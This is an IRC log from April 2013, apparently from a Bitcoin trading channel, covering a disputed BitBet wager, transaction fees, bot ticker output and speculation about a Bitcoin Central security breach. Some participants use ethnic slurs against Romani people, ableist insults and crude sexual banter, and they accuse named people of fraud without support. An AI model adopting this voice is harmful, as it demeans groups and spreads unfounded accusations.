20:24:43 any of you folks running multiple nodes willing to do a node mapping project ? Apr 01 20:24:54 https://bitcointalk.org/index.php?topic=101902.msg1700671#msg1700671 << lol Apr 01 20:25:35 hey Apr 01 20:25:40 hello Apr 01 20:25:48 Sure Apr 01 20:26:00 yeah, i guess blockchain.info sometimes loses its wallet connections and takes a bit to reconnect to other nodes. Apr 01 20:26:07 jborkl let me know! Apr 01 20:26:11 how long does it take for bets to show max Apr 01 20:26:12 just was curious. thx :) Apr 01 20:26:18 how was the outcome of the avalon bet yes Apr 01 20:26:23 i know btc can be slow ass hell sometimes Apr 01 20:26:30 they did not deliver half of their pre-orders lol Apr 01 20:26:34 podizzle what bets, what max ? Apr 01 20:26:34 such bullshit lmao Apr 01 20:26:58 therusytrombone how you judge ? Apr 01 20:27:03 ok, I am going to go to lunch them I will let you know, shouldnt take too long Apr 01 20:27:12 at the time that statement was made, there were two batches for pre-order Apr 01 20:27:17 16yhNwTB4wxSjbJu8Ev3TantqYyn6AEUcJ Apr 01 20:27:24 so you would have to guess or assume that the statement meant only batch one? Apr 01 20:27:33 if you go by the timing, batch 1 and 2 were already in Apr 01 20:27:37 yeah. it's been widely discussed here / in the comments there too Apr 01 20:27:44 it doesnt make sense Apr 01 20:27:51 are you supposed to bet on how the statement is written Apr 01 20:27:58 or how it was supposed to be interpreted? Apr 01 20:27:59 you are, yes. Apr 01 20:28:18 so by how it was written, and the date it was created, the outcome should be No Apr 01 20:28:28 any written text has the problem of reading. this is why there exist courts irl. Apr 01 20:28:32 i think bitbet has lots of potential but 30btc to buy shares damn Apr 01 20:28:41 a reading including batch two is nonsensical as batch two wasn't even slated for delivery till apr 5 Apr 01 20:28:42 i'm starting to think the site is kinda rigged Apr 01 20:28:47 podizzle: find a broker Apr 01 20:28:55 this bfl talk haunts me wherever i go Apr 01 20:28:56 podizzle you can use ppl like coinbr Apr 01 20:28:59 or the passthroughs Apr 01 20:29:02 it doesnt matter, it was written that they will deliver 1/2 of their pre-orders Apr 01 20:29:05 nothing about batches Apr 01 20:29:06 i see thanks for the info Apr 01 20:29:09 and on that date, they had two batches Apr 01 20:29:17 so by what you are saying, it should have been a bad bed Apr 01 20:29:24 who owns that site, anyway? Apr 01 20:29:34 well, apparently your reading of the text doesn't match the admin's and the majority of bettor's/commenter's etc reading thereof. Apr 01 20:29:36 it happens. Apr 01 20:29:42 what a knee-jerk reaction to call that a Yes Apr 01 20:29:46 scam'd Apr 01 20:30:12 read the statement. read the date. how can you infer any other way? Apr 01 20:30:15 therusytrombone: can you link me :) Apr 01 20:30:23 http://bitbet.us/bet/269/avalon-will-deliver-asic-devices-before-april-1st/ Apr 01 20:30:24 http://bitbet.us/bet/269/avalon-will-deliver-asic-devices-before-april-1st/ Apr 01 20:30:43 pre-orders mean pre-orders, there is no mention of batches Apr 01 20:30:46 well, i read it the following way : the bet can't be about some corp delivering before april 1st items it promised to deliver starting april 5th Apr 01 20:30:56 that's inferring past what's written Apr 01 20:30:58 i understand that point Apr 01 20:31:06 no text carries its meaning inside. Apr 01 20:31:08 but then you are betting on what the creator meant but not what is written Apr 01 20:31:10 all text is interpreted. Apr 01 20:31:12 and that's a bad bet by the rules Apr 01 20:31:12 is this a bitbet site ? Apr 01 20:31:14 channel Apr 01 20:31:18 podizzle nope. Apr 01 20:31:24 wtf Apr 01 20:31:26 lol Apr 01 20:31:46 podizzle: we do go off topic from time to time Apr 01 20:32:05 therusytrombone if you take a strong nominalist view NOTHING is ever definitively provable Apr 01 20:32:06 podizzle: also, if you don't like naked people, be weary of clicking on a link from mircea_popescu Apr 01 20:32:08 ;;ticker Apr 01 20:32:08 and thus no bets are acceptable. Apr 01 20:32:15 BTCUSD ticker | Best bid: 102.51002, Best ask: 102.99990, Bid-ask spread: 0.48988, Last trade: 102.51000, 24 hour volume: 80196.49123987, 24 hour low: 91.00000, 24 hour high: 105.99000, 24 hour vwap: 98.06018 Apr 01 20:32:36 http://polimedia.us/dtng/c/src/136483017480.jpg mircea_popescu: radical skepticism ftw ! Apr 01 20:32:58 it says half of preorders Apr 01 20:33:04 they had two batches of preorders in at that time Apr 01 20:33:05 refute that. Apr 01 20:33:08 well ok, perfectly valid phylosophically but how the fuck will you run a site with it,. Apr 01 20:33:12 network hash rate about a month ago was 24th now, 64th - asicminer has only claimed maybe 10 th- the rest has to be (in a logical conclusion) = Avalon Apr 01 20:33:25 they did not deliver 450 devices Apr 01 20:33:45 i made my withdrawal to bitbet at 12:48pm Apr 01 20:33:47 it's ok it's just good to know a site is a scam and not to use it Apr 01 20:33:52 still nothing am i being impatient Apr 01 20:33:54 therusytrombone if you bet on the losing side i imagine it'd have been a lot more beneficial to argue this afore betting. Apr 01 20:34:05 people write crazy vague statements and expect people to infer what they meant Apr 01 20:34:06 jborkl: no, the rest is AMD, it's how they are still in business Apr 01 20:34:07 podizzle if you included no fee a tx can take 2 days. Apr 01 20:34:09 like, really? Apr 01 20:34:22 LOL, smickles good one Apr 01 20:34:23 mircea_popescu how much is the fee Apr 01 20:34:34 $unconfirmed Apr 01 20:34:37 smickles: 839 Apr 01 20:34:38 0.0005 works for most people. mpex includes 0.001 on al txs Apr 01 20:34:48 a few cents is a nice gesture to support the entire network. Apr 01 20:35:00 [HAVELOCK] [SDICE] 7 @ 0.4199 = 2.9393 BTC [+] Apr 01 20:35:10 lol how could you ever read that statement and not think it means all of the preorders they have in at the time Apr 01 20:35:10 oh damn but i will be put in at the weight it was when i sent or when i clicked Apr 01 20:35:11 SCAM Apr 01 20:35:13 lmao Apr 01 20:35:19 [MPEX] [S.MPOE] 8294 @ 0.0006 = 4.9764 BTC [-] Apr 01 20:35:22 podizzle when the bet makes it . Apr 01 20:35:33 ok Apr 01 20:35:50 thats a little scary but ok Apr 01 20:35:50 therusytrombone im sure avalon said something on the forum about a future batch to be delivered in 2014 Apr 01 20:35:59 why not extend to anything they ever mentioned ffs. Apr 01 20:36:07 at the time the statement was created, they had two preorder batches in Apr 01 20:36:12 you keep dancing around my fact Apr 01 20:36:14 facts Apr 01 20:36:18 except one wasn't slated for delivery by that date Apr 01 20:36:19 with crazy statements Apr 01 20:36:27 the creator of the statement Apr 01 20:36:31 in the comments Apr 01 20:36:35 even says that he put in batch 1 Apr 01 20:36:36 listen. if you pick some facts you can support any pov/claim any other is insane/vague/we Apr 01 20:36:37 and it was left out Apr 01 20:36:38 so....? Apr 01 20:36:41 intentionally vague Apr 01 20:36:42 site is a scam Apr 01 20:36:44 mircea_popescu so if the bet isnt made by resolved then it will be a refund? Apr 01 20:36:51 or if the bet isnt made by closed Apr 01 20:36:57 if the bet doesn't make it before bet is closed then it's a donation. Apr 01 20:37:01 don't use bitbets, it's a scam Apr 01 20:37:07 lock'd Apr 01 20:37:23 http://bitbet.us/faq/#15 Apr 01 20:37:37 therusytrombone it just works a certain way. Apr 01 20:37:38 the fact that the creator of the statement even admitted that part of it got left out Apr 01 20:37:43 should have been a bad bet at minimum Apr 01 20:37:44 joke site Apr 01 20:37:45 <3 bitbet Apr 01 20:37:45 something's not a scam because it works otherwise than you think it should. Apr 01 20:38:10 if you read the statement Apr 01 20:38:15 and look at the date it was created Apr 01 20:38:17 won some off the basketball games this weekend! Apr 01 20:38:24 there are two preorder batcxhes Apr 01 20:38:25 you have not refuted that Apr 01 20:38:25 [BTCTC] [BASIC-MINING] 1 @ 0.38 BTC [+] Apr 01 20:38:38 let me ask again Apr 01 20:39:36 what about a bet where i sent money during open betting but is not placed before betting is closed. donation or refund Apr 01 20:39:43 therusytrombone one of the batches you count was not supposed to start delivery until after the bet closes. Apr 01 20:39:45 i think smickles is right and blockchain info is reporting 500 max Apr 01 20:39:50 but it didn't say that Apr 01 20:39:53 it said all preoders Apr 01 20:39:55 this is your refutation. now, whether you take it in or ingore it is up to you, but it stands. Apr 01 20:39:57 there were two batches for preorder Apr 01 20:39:59 PLEASE refute that Apr 01 20:40:00 you havent Apr 01 20:40:02 because you are a joke Apr 01 20:40:03 mkay. Apr 01 20:40:05 just like bitbet Apr 01 20:40:05 lmao Apr 01 20:40:06 lol Apr 01 20:40:15 podizzle donation. Apr 01 20:40:17 it stands in your tiny mind Apr 01 20:40:24 [MPEX] [S.MPOE] 5051 @ 0.00060809 = 3.0715 BTC [+] Apr 01 20:40:25 still looking , but I am seeing a bunch not on the blockchain list Apr 01 20:40:25 [MPEX] [S.MPOE] 4367 @ 0.00060871 = 2.6582 BTC [+] Apr 01 20:40:28 [MPEX] [S.MPOE] 2900 @ 0.00061276 = 1.777 BTC [+] Apr 01 20:40:30 [MPEX] [S.MPOE] 2932 @ 0.00061415 = 1.8007 BTC [+] Apr 01 20:40:33 and this seems the perfect time to announce the shocker of march results of bitbet. here goes : Apr 01 20:40:41 http://trilema.com/2013/bitbet-march-2013-statement/ Apr 01 20:40:44 1) create an intentionally vague statement Apr 01 20:40:51 2) wait for heavy betting action on one side Apr 01 20:40:56 therusytrombone if a statement doesn't please you, why bet ?! Apr 01 20:41:00 3) have your judge/moderator friend tell you how he'll rule Apr 01 20:41:07 4) bet on that side Apr 01 20:41:08 5) profit Apr 01 20:41:10 ez game Apr 01 20:41:13 bitbet confirmed scam Apr 01 20:41:15 nice profits, very good for the second month? Apr 01 20:41:23 jborkl 3rd month Apr 01 20:41:27 3rd Apr 01 20:41:29 unless i'm crazy first was jan ? a ok Apr 01 20:41:32 oh ok, well still very nice Apr 01 20:41:44 but yea it went up a lot. Apr 01 20:43:02 anyway, one measure we're taking is having a special mod tag on the comments so that mod can clarify how they'll judge statements if need be. Apr 01 20:43:20 to all paranoid : http://www.joshianlindsay.com/index.php?id=126 Apr 01 20:43:33 and re the late bets : it is in general not nice to include txs with no fees. it is callous, miners work at this, buitcoin needs the fees to survive. Apr 01 20:43:42 in the case of bitbet it is outright dangerous, so not worth it. Apr 01 20:44:00 a small fee to the tune of a few cents ensures next-block inclusion for pretty much all txs Apr 01 20:44:29 mircea ok Apr 01 20:44:36 mircea_popescu: nice results on s.bbet for march! Apr 01 20:44:56 now, i understand this is not necessarily expected bejhaviour / can gotcha. i'm sorry for it but there's no practical way out. Apr 01 20:45:47 my bet went through haha yeaaaaaaaaaah! Apr 01 20:46:01 [HAVELOCK] [SDICE] 3 @ 0.44969999 = 1.3491 BTC [+] Apr 01 20:48:11 i dont understand how would i make a donation if any transfer is counted as a bet should i make it 1.005 and its assumed the .005 is a tip? Apr 01 20:48:44 podizzle if you use the stock client there's a menu to fix tx fee. Apr 01 20:48:54 settings or options or something Apr 01 20:49:48 error4733 http://www.joshianlindsay.com/images/205.jpg ahaha Apr 01 20:50:44 Starcraft 2 bitcoin tourmanent, Join us over at sc2btc.com/play! Free to play sit and go tournament :D Apr 01 20:51:10 haha now that's an idea Apr 01 20:51:29 [MPEX] [S.DICE] 1021 @ 0.00380001 = 3.8798 BTC [-] Apr 01 20:53:41 now this is handy Apr 01 20:53:44 $unconfirmed Apr 01 20:53:47 smickles: 663 unconfirmed transactions. Oldest dated: 2013-03-30 16:07:38 Apr 01 20:54:07 nice Apr 01 20:54:12 mpexbot is becoming like a maven Apr 01 20:54:23 $help Apr 01 20:54:24 mircea_popescu: (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. Apr 01 20:54:30 $list Apr 01 20:54:31 listen you ttoally gotta populate that. Apr 01 20:54:31 smickles: Admin, Channel, Config, Misc, Owner, Services, SupyMPEx, and User Apr 01 20:54:35 a nm! Apr 01 20:54:53 and I do need to put in a couple docstrings Apr 01 20:54:56 now if only i can remember list Apr 01 20:55:02 $list SupyMPEx Apr 01 20:55:03 smickles: avg, depth, email, moo, mpexlag, post, proxies, unconfirmed, and vwap Apr 01 20:55:17 aha Apr 01 20:55:25 can you redirect $help to $list supympex ? Apr 01 20:55:40 $email Apr 01 20:55:41 nanotube: ^ help :) Apr 01 20:55:42 mircea_popescu: No new messages received. Apr 01 20:56:21 and also add the leading $ and say somethinc like "Available commands : " Apr 01 20:56:37 $vwap ^oix Apr 01 20:56:40 mircea_popescu: ^OIX 1 day: no data 7 day: average: 100.30864847 high: 132.25174812 low: 86.04499804 volume: 9075 btc: 4482.82710187 30 day: no data Apr 01 20:56:48 whoa nelly. Apr 01 20:57:14 132, not bad Apr 01 20:57:47 $commands Apr 01 20:57:52 hmm Apr 01 20:58:02 $buttsex Apr 01 20:58:18 ah, mircea_popescu do you remember that assbot pic? Apr 01 20:58:23 notrly ? Apr 01 20:58:39 well, nvm. Apr 01 20:59:02 [MPEX] [S.MPOE] 6690 @ 0.0006 = 4.014 BTC [-] Apr 01 20:59:18 6!??! Apr 01 21:00:09 end of world. Apr 01 21:00:50 http://www.youtube.com/watch?v=NU3g7XFCZFw Apr 01 21:00:52 it's been landing on .0006 a few times in the last number of days Apr 01 21:01:10 ups and downs Apr 01 21:01:11 no worries Apr 01 21:01:50 as btc went from 20 to 100 s.dice lost like what, 50-60% ? Apr 01 21:01:59 s.mpoe lost about 20% i think Apr 01 21:02:11 satoshi dice lost why would it lose Apr 01 21:02:13 oddly enough this could be said to make sone sense Apr 01 21:02:27 podizzle well would you prefer "shed" ? Apr 01 21:02:45 no i mean the underlying reasons why Apr 01 21:02:55 i prefer "two sheds" Apr 01 21:02:57 ;D Apr 01 21:02:57 well there's this theory that people wil lbet less btc Apr 01 21:03:10 because its too valued Apr 01 21:03:16 even a satoshi? Apr 01 21:03:17 more generally, in fiat terms corp went from 15 to 50mn ? Apr 01 21:10:32 yeah! and I like how after the march MPOE beatdown the statements are there in full glory - ugly or not. Apr 01 21:11:56 those were some HUGE numbers, but the reality of those statements to me adds some trust there. MPEx sailed through some massive attacks this past month too. Apr 01 21:12:12 Sail strong MPEx! Apr 01 21:12:27 <_aeon> squirt Apr 01 21:12:38 mod6: mpex is a scam and mircea_popescu is a greasy fraud Apr 01 21:12:44 :P Apr 01 21:12:46 <_aeon> probably smickles Apr 01 21:13:21 you forgot to call him a gypsy Apr 01 21:13:33 <_aeon> judges in romania are like $500 Apr 01 21:14:01 i say this, from the bottom of my heart : Apr 01 21:14:02 buttseks. Apr 01 21:14:09 :> Apr 01 21:14:11 damn smickles I knew it. Now where am I gonna find a chum to sell my account to? Apr 01 21:14:23 he's probably having buttsex right now, that pervert Apr 01 21:14:30 no im not. too much effort Apr 01 21:14:37 i got a fever ;/ Apr 01 21:14:37 <_aeon> i bet his finger is at least in a butt Apr 01 21:14:45 :( Apr 01 21:14:47 I'm sure of it - I heard that online somewhere Apr 01 21:14:50 aw, get well soon mp Apr 01 21:14:56 and the only prescription Apr 01 21:14:58 the only cure Apr 01 21:15:01 is more COWBELL Apr 01 21:15:01 hot from all that buttseks Apr 01 21:15:03 <_aeon> is whiskey Apr 01 21:15:09 always moar cowbell Apr 01 21:15:16 lol Apr 01 21:15:25 m00 Apr 01 21:15:29 <_aeon> bourbon makes fever go away Apr 01 21:15:31 anyway, it's breaking already. i am blessed with this bizzare trait whereby a cold stays with me for 6 hours if its really bad Apr 01 21:15:31 <_aeon> known. Apr 01 21:15:49 abracadabra Anduck arij asa1024 asciilifeform assbot Azelphur Apr 01 21:15:52 who's _aeon anyway Apr 01 21:16:04 <_aeon> yo mamma Apr 01 21:16:06 dunno, they sound cool tho Apr 01 21:16:34 my mamma cvan't type that fast, Apr 01 21:16:37 she works for the govt. Apr 01 21:16:51 <_aeon> dem gubments Apr 01 21:17:14 <_aeon> i'm noob Apr 01 21:17:33 no you're not, what noob has cloaks. Apr 01 21:17:46 <_aeon> paranoidmuch Apr 01 21:17:52 just curious dood. Apr 01 21:17:59 <_aeon> muahahaha Apr 01 21:18:03 lol, _aeon, your 14:12 -!- _aeon [~FUCKSUPA@unaffiliated/aeon/x-3095533] , funny Apr 01 21:18:12 o its supa ?! Apr 01 21:18:25 btw, anyone saw herodes' butthurt in forum over being neg'd ? Apr 01 21:18:29 <_aeon> that would be the farthest from the truth Apr 01 21:18:34 <_aeon> but let's run with it Apr 01 21:18:55 <_aeon> i'm wuzzywubing all over Apr 01 21:19:22 <_aeon> i like to read butthurt Apr 01 21:20:48 on gibson. who the fuck connects on gibson Apr 01 21:20:51 mircea_popescu: i was sort of pissed supa ruined my perfect rating :/ Apr 01 21:20:56 what's that like papua-new guiney Apr 01 21:20:58 who runs bitcoinity? Apr 01 21:20:59 *shrug* Apr 01 21:21:07 pgp a hungarian dood. Apr 01 21:21:11 comboy Apr 01 21:21:22 <_aeon> dude i'm being stalked Apr 01 21:21:27 the joker background is fun 'n all, but sure make looking at the charts hard on the eyes... Apr 01 21:21:28 <_aeon> stop you tickle Apr 01 21:21:29 i've never even talked to the guy... so that was kinda disappointing Apr 01 21:21:47 mod6 i think he just spammed gribble ratings Apr 01 21:22:08 yeah, apparently he's trying to make some sort of point Apr 01 21:22:24 ya. aka trolling. Apr 01 21:22:42 so anybody been using the .8.1 exploded ruin of a codebase packaging at all ? Apr 01 21:22:42 *nod* Apr 01 21:22:59 http://youtu.be/zorZohh06w0?t=3m22s < lol Apr 01 21:23:24 <_aeon> ;;rated Supa Apr 01 21:23:25 You rated user Supa on Thu Mar 28 11:20:54 2013, giving him a rating of -10, and supplied these additional notes: I AM RICK JAMES MOTHERFUCKER. Apr 01 21:23:31 i've got .7, but im still like 70 days behind. need to fire it up and let it catch up but it chokes my hd Apr 01 21:23:32 <_aeon> ;;unauth Apr 01 21:23:33 Your GPG session has been terminated. Apr 01 21:24:15 $grep "rick james" /xchatlogs/* Apr 01 21:24:26 <_aeon> goog luck Apr 01 21:24:28 !e Apr 01 21:24:35 1835 Apr 01 21:24:45 a lot of crying going on over .8.1 on bitcoin-dev Apr 01 21:25:00 ʎɐp ƃuıɹʇs ɯopuɐɹ ʎddɐɥ Apr 01 21:25:35 pgp ya well the old pos doesn't work (as detailed in http://trilema.com/2013/bitcoind-not-quite-ready-for-prime-time/ ) Apr 01 21:25:37 looks almost greek ... almoost - lol Apr 01 21:25:39 and the new pos i don't trust Apr 01 21:25:41 fucking locked ;/ Apr 01 21:26:07 ugh Apr 01 21:27:14 here's one for BBET - bet on date that dev team releases 1.0 Apr 01 21:27:31 Dec 31, 2018 is probably even money Apr 01 21:28:01 heh. Apr 01 21:28:06 time b/t 1.0 and 1.0.0.1? 1 day Apr 01 21:28:27 well i'm the eternal optimist : they stfu with the "Developing" which they can't do because they can't code Apr 01 21:28:35 start working testnet which is more adeuqate to their abilities Apr 01 21:28:48 and then finally when 1.0 is released that's after a spec has been made Apr 01 21:29:05 and so 1.0.0.1 being 1 day later doesn't quite have the cataclysmic implications. Apr 01 21:30:47 like anything in life, it'll will require competent resources AND competent management... Apr 01 21:31:12 a dash of vision / brilliance never hurts, either... Apr 01 21:31:48 $avg Apr 01 21:31:50 ThickAsThieves: 97.68 Apr 01 21:32:15 ;;ticker Apr 01 21:32:21 BTCUSD ticker | Best bid: 102.57701, Best ask: 102.89999, Bid-ask spread: 0.32298, Last trade: 102.57701, 24 hour volume: 77591.58336552, 24 hour low: 91.75000, 24 hour high: 105.99000, 24 hour vwap: 98.56399 Apr 01 21:33:19 it's great that miners get paid, but did satoshi ever think about getting the developers/stewards paid? Apr 01 21:33:31 is that what the bitcoin foundation is for? Apr 01 21:33:35 <_aeon> aethero comes online Apr 01 21:34:14 pgp i don't think the idea ever was for coders to be paid Apr 01 21:34:23 i'm not sayingthis is a good idea necessarily, but Apr 01 21:34:32 if it is decentralised then the paying would be whoever hires them Apr 01 21:35:13 they should move to devcoin Apr 01 21:35:37 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] Apr 01 21:35:39 bitcoin will need adjustments down the road - how can we ensure that the best and brightest are attracted to the endeavor? Apr 01 21:35:40 <_aeon> derpfiend eh Apr 01 21:35:52 anyway, if i query my crystal 8 ball what i see is each miner conglomerate having its own devteam. Apr 01 21:36:05 the current troop is really sinking their future by not doing spec work now, while they still can Apr 01 21:36:14 it WILL be done, but by miner negotiation, and they will be simply ignored. Apr 01 21:36:35 i believe you are right... Apr 01 21:36:42 yeah. the problem is they're cheeky kids Apr 01 21:36:45 and won't mostly listen. Apr 01 21:36:55 golden rule: he with the gold makes the rules... Apr 01 21:37:08 cause you know, i'm evil and impolite and therefore the fact that i regularly see the future is moot. Apr 01 21:37:34 sucks being a sith lord... Apr 01 21:37:53 <_aeon> use latinum bars Apr 01 21:37:57 notrly. i get the butts. Apr 01 21:38:08 lol Apr 01 21:39:03 seriously, though - sometimes the conversation on bitcoin-dev seems like it's coming from Deep Space 9... Apr 01 21:39:50 i can't go there. i get summaries (ocasionally) and even tho made by competent people they still piss me off. Apr 01 21:40:49 can i subscribe to those summaries? Apr 01 21:41:12 haha that might be an idea Apr 01 21:41:20 in any case, you're right about the mining oligarcy taking up the dev mantle eventually Apr 01 21:42:29 i think so. Apr 01 21:42:31 seems like the natural outcome... Apr 01 21:42:46 possibly some businesses might run their own clients. Apr 01 21:42:50 [BTCTC] [CRYPTO-TRADE] 80 @ 0.2 = 16 BTC [+] Apr 01 21:42:54 s.dice might make one, like the s.dice desktop client. Apr 01 21:43:05 probably valuable for things like slotmachines. Apr 01 21:43:14 or bitpay if they had any sense (and resources, and etc) Apr 01 21:44:45 certainly room out there for "subchains" it seem to me... Apr 01 21:44:59 that's a diff story. Apr 01 21:45:27 different topic: has anyone out there gotten kakobrekla's socket working? Apr 01 21:45:37 and would be willing to give me some assist on thing? Apr 01 21:45:42 sure Apr 01 21:45:46 o hai Apr 01 21:45:49 hi Apr 01 21:46:48 ;;ticker Apr 01 21:46:54 BTCUSD ticker | Best bid: 103.00010, Best ask: 103.15689, Bid-ask spread: 0.15679, Last trade: 103.00010, 24 hour volume: 77774.07869393, 24 hour low: 92.05000, 24 hour high: 105.99000, 24 hour vwap: 98.58243 Apr 01 21:46:59 [BTCTC] [ASICMINER-PT] 13 @ 0.76 = 9.88 BTC [+] Apr 01 21:47:05 [BTCTC] [ASICMINER-PT] 3 @ 0.76 = 2.28 BTC [+] Apr 01 21:47:20 [BTCTC] [COGNITIVE] 1 @ 0.1622 BTC [-] Apr 01 21:47:22 [BTCTC] [COGNITIVE] 1 @ 0.16213 BTC [-] Apr 01 21:47:24 [BTCTC] [COGNITIVE] 1 @ 0.16212 BTC [-] Apr 01 21:47:27 [BTCTC] [COGNITIVE] 4 @ 0.162 = 0.648 BTC [-] Apr 01 21:49:01 indeed aeon Apr 01 21:49:12 <_aeon> indeed Apr 01 21:50:56 [BTCTC] [ESECURITYSABTC] 4 @ 0.42 = 1.68 BTC [-] Apr 01 21:51:03 [BTCTC] [BASIC-MINING] 3 @ 0.36 = 1.08 BTC [-] Apr 01 21:52:43 [BTCTC] [ASICMINER-PT] 2 @ 0.75 = 1.5 BTC [-] Apr 01 21:57:23 <_aeon> http://cloudsigma.com/en/about-us/press-releases/233 Apr 01 21:57:45 <_aeon> today announced that that its customers will now be able to benefit from fax access to their cloud servers. Complementing the existing SSH and VNC access, ‘remote desktop via fax’ provides users without internet connection the ability to view their cloud servers. Apr 01 21:58:06 <_aeon> “we are always listening to customers and they were clear, where is your fax access? For some VNC just isn’t performant enough. This new service is a world first for CloudSigma and the result of six months innovation. Customers can now remotely view their screens from anywhere in the world via fax. Apr 01 21:58:24 <_aeon> totally normal tiberiusiv Apr 01 21:58:29 <_aeon> happens on mondays Apr 01 21:59:17 wats bitcoin central? Apr 01 22:01:43 oh run by forum staff, was a scam anyway Apr 01 22:02:11 [BTCTC] [S.DICE-PT] 9 @ 0.00479 = 0.0431 BTC [-] Apr 01 22:02:32 http://dpaste.com/1043267/ Apr 01 22:02:59 there are 3 bitcoind , i have to remote into the other and then I will also run data on them Apr 01 22:04:00 tiberiusiv: what's the deal? SP500 down... bitcoin up. :P Apr 01 22:04:49 [BTCTC] [S.DICE-PT] 112 @ 0.0048 = 0.5376 BTC [+] Apr 01 22:05:14 Obviously I did.. just giving you shit. Apr 01 22:05:21 ;;bids 100 Apr 01 22:05:29 There are currently 5833.3713 bitcoins demanded at or over 100.0 USD, worth 588194.297707 USD in total. | Data vintage: 0.0040 seconds Apr 01 22:06:40 dub bitcoin-central is run by davout/buncha french gypsies. Apr 01 22:07:49 jborkl that's like 35 nodes tho. Apr 01 22:09:40 http://blockchain.info/address/1LrPYjto3hsLzWJNstghuwdrQXB96KbrCy Apr 01 22:09:55 could be the mpoe loss is about to be surpassed Apr 01 22:10:03 I am getting more Apr 01 22:10:34 I will filter the info and pass it all along to you Apr 01 22:11:03 and I am pinging the other nodes to see who they are connected to Apr 01 22:11:14 <_aeon> bam Apr 01 22:11:16 dub what address is that for? Apr 01 22:11:22 a contest ? Apr 01 22:11:32 jborkl that's great! Apr 01 22:11:44 ThickAsThieves: nfi, could be the bitcoin central funds being stolen Apr 01 22:12:08 o no wai ?! Apr 01 22:12:40 https://bitcoin-central.net/ Apr 01 22:12:41 dafuck Apr 01 22:12:45 you're right Apr 01 22:12:51 Down for Maintenance Apr 01 22:12:51 We have detected a security breach. Services are temporarily suspended until we have thoroughly investigated the situation. We will resume services as soon as possible. Apr 01 22:12:53 ;;market --sell 200 Apr 01 22:12:54 A market order to sell 200 bitcoins right now would net 20440.0587 USD and would take the last price down to 102.1210 USD, resulting in an average price of 102.2003 USD/BTC. | Data vintage: 13.7545 seconds Apr 01 22:12:57 $avg Apr 01 22:12:58 thestringpuller: 97.78 Apr 01 22:13:01 ouch Apr 01 22:13:25 ;;asks 99.94 Apr 01 22:13:26 There are currently 0 bitcoins offered at or under 99.94 USD, worth 0.0 USD in total. | Data vintage: 45.6836 seconds Apr 01 22:13:36 ;;bids 100 Apr 01 22:13:36 There are currently 5422.1666 bitcoins demanded at or over 100.0 USD, worth 546061.361605 USD in total. | Data vintage: 56.5098 seconds Apr 01 22:14:03 ;;bids 10000000 Apr 01 22:14:08 There are currently 0 bitcoins demanded at or over 10000000.0 USD, worth 0.0 USD in total. | Data vintage: 86.8850 seconds Apr 01 22:14:28 well, that's optimism fer ya Apr 01 22:20:32 [BTCTC] [BTC-TRADING-PT] 1 @ 0.155 BTC [+] Apr 01 22:20:36 [BTCTC] [BTC-TRADING-PT] 1 @ 0.16 BTC [+] Apr 01 22:21:49 ;;market --sell 41854 Apr 01 22:21:59 A market order to sell 41854 bitcoins right now would net 3873261.6016 USD and would take the last price down to 84.7522 USD, resulting in an average price of 92.5422 USD/BTC. | Data vintage: 0.0024 seconds Apr 01 22:23:52 $4MM is a lot of money ... Apr 01 22:24:51 A market order to sell 100000 bitcoins right now would net 7681678.7165 USD and would take the last price down to 40.6212 USD, resulting in an average price of 76.8168 USD/BTC. | Data vintage: 44.2644 seconds Apr 01 22:25:20 ;;market --sell 50000 Apr 01 22:25:20 A market order to sell 50000 bitcoins right now would net 4539004.2120 USD and would take the last price down to 80.0000 USD, resulting in an average price of 90.7801 USD/BTC. | Data vintage: 73.6644 seconds Apr 01 22:27:22 https://instawallet.org/ says the same thing - the two are related? Apr 01 22:27:39 pgp yes Apr 01 22:28:25 are we watching a robbery in slow motion here or am I missing something? Apr 01 22:29:05 pretty much Apr 01 22:29:16 either they are mentally retarded and thibnk this is a fun april 1st thing to do Apr 01 22:29:21 or else they just got ficked. Apr 01 22:30:33 but several blocks have been mined since then and not a single confirmation? Apr 01 22:31:17 and .10 btc in fees Apr 01 22:31:18 hmmm Apr 01 22:31:30 looks odd to me... Apr 01 22:31:32 maybe the blocks are somehow borkt ? Apr 01 22:31:36 the tx i mean not blocks Apr 01 22:32:16 <_aeon> instawallet fubar or they move it all the cold storage as defense mechanism\ Apr 01 22:33:10 in general it's polite to say when you move large chunks like that Apr 01 22:33:17 i know when i did it i got flooded with q's. Apr 01 22:34:08 We have detected a security breach. << this seems to be a scary thing though - despite it being April 1st. Apr 01 22:34:19 but looks like it's being moved FROM cold storage... Apr 01 22:34:55 pgp yes... Apr 01 22:35:01 [HAVELOCK] [SDICE] 1 @ 0.4365005 BTC [-] Apr 01 22:35:31 hmm. Apr 01 22:35:44 http://blockchain.info/address/1LrPYjto3hsLzWJNstghuwdrQXB96KbrCy Apr 01 22:35:52 ^^mpoe-pr dug out, how? Apr 01 22:36:01 [HAVELOCK] [SDICE] 2 @ 0.4365005 = 0.873 BTC [-] Apr 01 22:36:01 she saw me saying Apr 01 22:36:05 i was quoting dub Apr 01 22:36:20 yeah man i noticed some strange uncofirmed in my bitcoin, that explains it! Apr 01 22:37:17 how safe do you think blockchain wallet is? Apr 01 22:37:27 not my coins, but man... just the thought of it makes my balls tingle with dread... Apr 01 22:37:35 yeah. Apr 01 22:37:44 prolly TMI... Apr 01 22:37:47 wtf cold wallet is that anyway. Apr 01 22:37:52 lukewarm wallet. Apr 01 22:38:39 hot wallet with a few ice cubes... Apr 01 22:41:35 hmm. strange. maybe just someone fucked up? Apr 01 22:41:47 yeah that's usually what it is. Apr 01 22:42:20 whooops, accidentally sent all the cold storage to my own wallet... LATER! Apr 01 22:42:32 my bad , i quit. Apr 01 22:47:21 must just be some kinda joke Apr 01 22:47:39 nice guys though. i'll be sure to do business over there. not Apr 01 22:48:56 [MPEX] [S.MPOE] 13441 @ 0.00060554 = 8.1391 BTC [+] Apr 01 22:57:59 <_aeon> http://en.wikipedia.org/wiki/Autonomous_sensory_meridian_response Apr 01 22:58:09 <_aeon> who wants to talk about that or admit that it happens to you Apr 01 22:58:22 <_aeon> specifically, the head-rush tingling from music Apr 01 22:58:29 wut Apr 01 22:58:31 <_aeon> or someone touching your head or whispering Apr 01 22:58:38 <_aeon> i'm looking for data Apr 01 22:58:48 <_aeon> people who will admit that this happens to them Apr 01 23:03:29 _aeon: but why here? Apr 01 23:03:42 <_aeon> nm Apr 01 23:03:50 <_aeon> diareah of the hands Apr 01 23:04:05 <_aeon> *diarrhea Apr 01 23:04:57 anyway it does happen to me, mostly when i realize some fubar situation Apr 01 